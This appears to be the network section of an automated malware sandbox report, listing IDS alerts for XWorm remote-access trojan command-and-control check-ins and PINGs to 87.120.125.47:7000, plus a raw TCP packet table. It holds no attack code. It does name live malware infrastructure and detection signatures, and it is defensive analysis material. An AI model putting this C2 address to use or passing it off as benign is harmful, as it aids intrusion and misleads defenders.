                    2025-01-03T14:08:49.289059+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:49.297369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.461112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.464486+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.551238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.552997+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.644750+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.646220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.723432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:50.725396+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.802939+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.897646+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.902763+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:50.995663+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.007122+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.088767+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:51.093644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:53.336467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:53.342240+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:54.930018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:54.931644+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:55.851922+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:55.858233+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:08:55.981477+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:55.981477+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:58.211406+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:08:58.258236+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.136759+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:01.138062+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.225686+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:01.322255+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:06.476691+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:06.478780+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:11.325602+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:11.330253+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:13.336525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:13.344413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:13.436101+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:13.440256+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:20.229781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:20.233278+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:21.476571+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:21.484371+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:21.576018+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:21.580271+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:25.399402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:25.403642+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:25.944410+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:25.944410+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.337864+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.338032+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:27.339604+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:27.344416+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:37.382583+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:37.388404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:37.699959+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:37.704422+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:38.299166+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:38.304303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:47.195629+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:47.197312+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:47.555250+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:47.558589+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:52.648936+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:52.650949+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:52.944630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:52.946369+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.039248+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.044482+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:53.263432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:09:55.941742+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:09:55.941742+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:02.589170+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:02.591056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:03.048695+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:03.050258+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:03.141843+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:03.143437+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.195539+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.203880+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.322235+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.323976+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:13.415532+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:13.417056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:22.664732+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:22.666304+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:24.610608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:24.612694+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:25.942800+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:25.942800+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.711534+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.713528+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.809849+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.811492+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.903054+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.904303+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:34.995921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:34.997326+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:35.088920+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:35.091153+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.120046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.121619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.213398+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.218478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.310161+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.311654+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:45.403174+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:45.405751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:50.826218+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:50.828802+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:50.920411+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:50.921759+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:51.013312+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:51.015010+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:51.106485+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:51.107738+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:55.246273+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:55.248291+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:10:55.942781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:55.942781+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:56.325098+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:56.325098+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:59.308022+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:10:59.337165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP
                    2025-01-03T14:11:00.870752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.125.477000192.168.2.449731TCP
                    2025-01-03T14:11:00.871460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973187.120.125.477000TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 3, 2025 14:07:00.570508957 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:00.570538998 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:00.570601940 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:00.591351032 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:00.591362953 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.072931051 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.073010921 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:01.077982903 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:01.077991009 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.078263044 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.131035089 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:01.141375065 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:01.187341928 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.633932114 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.633997917 CET44349730172.67.19.24192.168.2.4
                    Jan 3, 2025 14:07:01.634056091 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:01.650686026 CET49730443192.168.2.4172.67.19.24
                    Jan 3, 2025 14:07:05.869640112 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:05.874458075 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:05.874562979 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:06.324534893 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:06.329504967 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:19.183005095 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:19.187800884 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:19.356985092 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:19.383878946 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:19.388684034 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:26.053811073 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:26.099967003 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:32.022135973 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:32.027098894 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:32.199336052 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:32.200994015 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:32.205818892 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:44.884918928 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:44.889780045 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:45.057720900 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:45.099874020 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:45.119776011 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:45.124532938 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:55.943480968 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:55.990519047 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:57.725306034 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:57.730151892 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:57.899616957 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:07:57.900945902 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:07:57.905721903 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:07.756355047 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:07.762268066 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:07.931512117 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:07.937369108 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:07.942197084 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:08.256393909 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:08.261279106 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:08.429734945 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:08.431252003 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:08.436053991 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.787636995 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:18.792474031 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.834656000 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:18.839473009 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.881438971 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:18.886223078 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.960692883 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.962532997 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:18.967334986 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:18.990848064 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:18.995594025 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.006355047 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.011183977 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.131551981 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.225075960 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.225960016 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.226166964 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.266690969 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.266872883 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.271687031 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.312128067 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.314165115 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.318886995 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.358606100 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.361315012 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.406749010 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.477694035 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:19.479640007 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:19.484831095 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:25.664558887 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:25.669495106 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:25.839736938 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:25.847863913 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:25.852660894 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:25.963366032 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:26.008635998 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.147136927 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.151952982 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.209532976 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.214330912 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.225193024 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.229939938 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.242178917 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.246936083 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.322721004 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.328176022 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.333012104 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.409394979 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.411983967 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.416729927 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.503592968 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.505485058 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.510258913 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.597018957 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:29.603255987 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:29.608057022 CET70004973187.120.125.47192.168.2.4
